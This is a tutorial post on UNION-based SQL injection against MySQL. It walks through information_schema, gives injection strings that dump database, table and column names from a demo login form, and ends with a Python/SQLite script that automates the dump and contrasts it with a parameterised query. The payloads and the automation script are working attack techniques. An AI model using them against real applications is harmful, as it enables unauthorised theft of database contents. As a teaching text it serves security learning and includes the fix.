How to use SQL injection to dump an entire database
What can SQL injection do?
In "SQL Injection basics" I introduced the basic principle of SQL injection and an experimental setup for trying it. The next question is: what can SQL injection actually do?
Many people assume that SQL injection can only retrieve records from the table the vulnerable query already reads, and that the contents of other tables are out of reach. Is that true?
A thief who climbs in through a window is not confined to that one room; he can ransack the whole house.
Don't believe it? Let's look at how a MySQL database is taken apart.
Walking a MySQL server from the root
If you are the attacker and know nothing about which tables and columns exist, how can you steal the database contents?
The answer is that MySQL has a metadata database. It describes every database on the MySQL server, every table in each database, and every column in each table. It is the equivalent of a floor plan that marks where all the valuables in the house are kept.
That metadata database is the root. Once you hold the root, you follow this order:
metadata database -> database list -> table list -> column list -> table contents
and this tree-shaped traversal lets you carry off the entire contents of the database. Here is a demonstration.
Where is the metadata database?
I said MySQL has a metadata database, but where is it hidden? Log in to MySQL and run show databases;
to get the list of all databases, as shown in the figure:
The database highlighted in red in the figure, information_schema, is the metadata database. It holds the catalog of everything on the server and is the starting point for exploring it.
Enter the information_schema database:
The root we are talking about is the SCHEMATA table, which describes all the databases in MySQL.
Then the TABLES table lists the tables under each database, and the COLUMNS table lists the columns of each table. The following shows how to walk through them in order.
List all databases
The SCHEMATA table describes every database. A plain SELECT is all that is needed:
SELECT * FROM information_schema.SCHEMATA
This displays the whole table:
Note that the queries here do not first switch into a database with USE; they address tables as <database name>.<table name> instead. So information_schema.SCHEMATA above refers to the SCHEMATA table under the information_schema database.
In the figure, the SCHEMA_NAME column is the database name. The query result shows that this MySQL server has five databases.
List the tables
With the database list in hand, you can list all tables in a given database (or in all databases at once). For example, to list every table in the lyt_test database, use:
SELECT TABLE_SCHEMA, TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'lyt_test'
The query result:
TABLE_NAME in the right column is the table name and TABLE_SCHEMA in the left column is the database name. Because lyt_test contains only the accounts table, only one row is output.
List all columns of a table
Next, the COLUMNS table gives the columns of a table. The following statement lists every column of the accounts table, with its name and type:
SELECT TABLE_NAME, COLUMN_NAME, DATA_TYPE FROM information_schema.COLUMNS WHERE TABLE_NAME = 'accounts'
All columns of the accounts table and their types:
If more than one database on the server has a table named accounts, add AND TABLE_SCHEMA = 'lyt_test' to the WHERE clause so that only the intended table is listed.
Read all records in a table
Reading the contents of accounts is then trivial; anyone who has learned SQL writes:
SELECT * FROM lyt_test.accounts
The result:
At this point you know how to walk out of MySQL with every row it holds.
Finding the fulcrum
The ancient physicist Archimedes is credited with saying:
Give me a place to stand and I will move the earth.
The previous section showed how, without knowing anything about how the MySQL data is organized, the metadata database information_schema lets you walk step by step to the entire contents of the database.
So how do we do the same through SQL injection? That is the fulcrum you are looking for.
Remember the experiment in the previous article? With SQL injection, all data in the userinfo table could be stolen. But only the WHERE part was under our control; the SELECT ... FROM ... part, that is the column list and the table name, cannot be injected into. How then can we read data from other tables?
The secret is the UNION statement. Standard SQL provides UNION to combine the results of two SELECT statements into one result set. Its syntax is:
SELECT column_name1(s) FROM table_name1 UNION SELECT column_name2(s) FROM table_name2
The one requirement is that the two SELECT statements return the same number of columns.
With UNION, SELECT * from userinfo WHERE ... and SELECT * from lyt_test.accounts can be combined into one result.
Wait. As the attacker I don't have the source code, so how do I know how many columns SELECT * from userinfo returns?
Obviously I don't, but the value can be found by trial: inject UNION SELECT 1, ... N with increasing N. First SELECT 1, then SELECT 1,2, then SELECT 1,2,3, until the statement stops throwing an error. Try it directly in MySQL first; the result looks like this:
The test shows that the SELECT must return exactly two columns; anything else raises an error.
Also, remember that the WHERE clause being injected into has two conditions (name = 'name' AND passwd = 'passwd'). In real code the condition may be considerably more complex, and even hard for an attacker to guess. Into which variable should the UNION go so that the whole statement remains a valid query?
The safest approach is to inject UNION SELECT ... into the first variable and follow it with a comment marker, which comments out the rest of the statement so that whatever follows no longer matters. In MySQL the comment character is #.
After all that explanation, let's verify it with an injection test:
Enter the following in the username text box: ivan' union select 1,2#
Like so:
Click the login button; the result is shown below:
Note the resulting SQL statement:
SELECT * FROM userinfo WHERE name = 'ivan' union select 1,2# AND passwd = ''
The # comments out everything after it; MySQL drops that part while parsing, so the statement is equivalent to:
SELECT * FROM userinfo WHERE name = 'ivan' union select 1,2
The result of select 1,2 is a constant row. In the examples that follow we instead query data from a table, not merely a constant row.
So UNION and # are our fulcrum against the database.
Dumping the database in practice
Everything is in place. Now let the wind blow, and blow harder.
The following experiments use the demo database application built in "SQL Injection basics". If you are not familiar with SQL injection, read that article first; beginners are also advised to build the same demo application so they can experiment and test along the way.
Dumping the database list
Inject into username:
ivan' union select 1,SCHEMA_NAME from information_schema.SCHEMATA #
This returns the list of all databases, for example:
The red box shows the database list. In the UNION SELECT ... statement, the first column is the constant 1 and the second column is the SCHEMA_NAME column of the information_schema.SCHEMATA table, which is exactly the database name.
Dumping the table names in a database
To keep the output small, we dump only the table names in the lyt_test database. Inject into username:
ivan' union select 1,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA = 'lyt_test'#
This lists all tables in lyt_test, as shown:
The only difference is that lyt_test has just one table, accounts; otherwise the principle is the same as the database dump and needs no further explanation.
Dumping all columns of a table
Dumping only the columns of the accounts table. Inject into username:
ivan' union select 1, COLUMN_NAME from information_schema.COLUMNS WHERE TABLE_NAME = 'accounts' #
The result:
The column names are highlighted in red. What about their types? Change the injected text to:
ivan' union select 1, DATA_TYPE from information_schema.COLUMNS WHERE TABLE_NAME = 'accounts' #
This returns the column types, as shown:
The red marks are the types of the first two columns: ID is of type char and balance is of type float.
This reveals a rule: each injection retrieves one column of the target table. If the table has N columns, N injections obtain the complete table.
Dumping all records of a table
Not spelled out here; practice it yourself. It works exactly the same way as above.
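The following is an added example, not code from the article or its demo application. It puts the two pieces above together in one runnable script: the UNION fulcrum (probing the column count and commenting out the rest of the WHERE clause) and the dump chain (table list, column list, table contents), and then shows the same payload failing against a parameterised query. It is built on SQLite so that it runs offline; the table names userinfo and accounts and the columns of accounts follow the article, the row contents are constructed, and sqlite_master and pragma_table_info() are assumed as stand-ins for information_schema.TABLES and information_schema.COLUMNS. The SQLite comment marker -- is used where the article uses MySQL's #. It also goes one step past the article: group_concat packs every column name and type into a single value, so the N injections the article needs for N columns collapse into one.

```python
import sqlite3

# Added example (not the article's own code): a miniature of the demo
# application from "SQL Injection basics", rebuilt on SQLite so it runs
# offline. Table names (userinfo, accounts) and the column names of
# accounts follow the article; the row contents are constructed here.
# SQLite has no information_schema, so sqlite_master stands in for
# information_schema.TABLES and pragma_table_info() for
# information_schema.COLUMNS.

COMMENT = "-- "   # SQLite end-of-line comment; in MySQL '#' works as well


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE userinfo (name TEXT, passwd TEXT);
        INSERT INTO userinfo VALUES ('ivan', 'secret');
        CREATE TABLE accounts (id TEXT, balance REAL);
        INSERT INTO accounts VALUES ('A-001', 12.5), ('A-002', 340.0);
    """)
    return conn


def vulnerable_login(conn, name, passwd):
    # The bug the article exploits: user input is spliced into the SQL text,
    # so a quote in `name` ends the string literal and the rest is parsed as SQL.
    sql = f"SELECT * FROM userinfo WHERE name = '{name}' AND passwd = '{passwd}'"
    return conn.execute(sql).fetchall()


def safe_login(conn, name, passwd):
    # The fix: bound parameters keep the input as data; no UNION can be spliced in.
    sql = "SELECT * FROM userinfo WHERE name = ? AND passwd = ?"
    return conn.execute(sql, (name, passwd)).fetchall()


def find_column_count(conn, max_cols=10):
    # Probe UNION SELECT 1, then 1,2, then 1,2,3 ... until the database stops
    # rejecting the statement for a column-count mismatch.
    for n in range(1, max_cols + 1):
        constants = ",".join(str(i) for i in range(1, n + 1))
        payload = f"ivan' UNION SELECT {constants}{COMMENT}"
        try:
            vulnerable_login(conn, payload, "")
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError("column count not found within max_cols")


def inject(conn, select_tail):
    # Use the discovered width (2): column 1 is padded with the constant 1,
    # column 2 carries whatever we want to read out of another table.
    payload = f"ivan' UNION SELECT 1,{select_tail}{COMMENT}"
    rows = vulnerable_login(conn, payload, "")
    # ivan's genuine row is ('ivan', 'secret'); rows starting with 1 are ours.
    return [row[1] for row in rows if row[0] == 1]


def dump_chain(conn):
    # The article's traversal: table list -> column list -> table contents.
    tables = inject(conn, "name FROM sqlite_master WHERE type = 'table'")
    # group_concat folds every column name and type into one value, so one
    # injection replaces the N injections the article needs (MySQL has the
    # same function, and CONCAT_WS for packing several columns of a row).
    columns = inject(conn, "group_concat(name || ':' || type) "
                           "FROM pragma_table_info('accounts')")
    records = inject(conn, "id || ':' || balance FROM accounts")
    return {"tables": sorted(tables),
            "columns": columns[0],
            "records": sorted(records)}


if __name__ == "__main__":
    db = make_db()
    print("columns in userinfo query:", find_column_count(db))
    print(dump_chain(db))
    print("same payload via safe_login:",
          safe_login(db, "ivan' UNION SELECT 1,2" + COMMENT, ""))
```

Two practical notes. The probe in find_column_count relies on the database reporting the UNION column mismatch as an error; an application that swallows errors and shows a generic page forces you onto blind techniques instead. And the only change between vulnerable_login and safe_login is the use of placeholders: the payload that dumps accounts through the first function is matched as a literal username by the second and returns nothing.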
Summary
Dumping a database through SQL injection turned out to be easy, but it has several necessary conditions.
Have you mastered the essence of dumping a database? Go and try it.
Note: This article